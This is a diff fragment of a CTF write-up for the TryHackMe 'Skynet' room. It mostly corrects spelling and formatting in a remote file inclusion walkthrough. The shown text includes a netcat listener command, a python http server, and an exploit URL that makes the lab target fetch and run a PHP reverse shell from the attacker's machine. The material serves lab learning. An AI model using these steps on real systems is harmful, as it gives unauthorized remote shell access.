MaxwellCaron/writeups/TryHackMe/Skynet-Writeup.md

 </div>
 ```

-As we can see the file contents are embeded into the output, this means that this application is vulnerable.
-Knowing this we can make use of *<REDACTED> file inclusion* by starting a python http server and having the server get our `php-reverse-shell.php` onto the box.
+As we can see the file contents are embedded into the output, this means that this application is vulnerable.
+Knowing this we can make use of *<REDACTED> file inclusion* by starting a python http server, `python3 -m http.server`, and having the server get our `php-reverse-shell.php` onto the box.

 ```
 $ nc -lnvp 9001
 listening on [any] 9001 ...
 ```

-First set up a netcat listener on your attacking machine.
+First set up a `netcat` listener on your attacking machine.

 ```
 http://10.10.146.95/<REDACTED>/administrator/alerts/alertConfigField.php?urlConfig=http://<YOUR IP>:8000/php-reverse-shell.php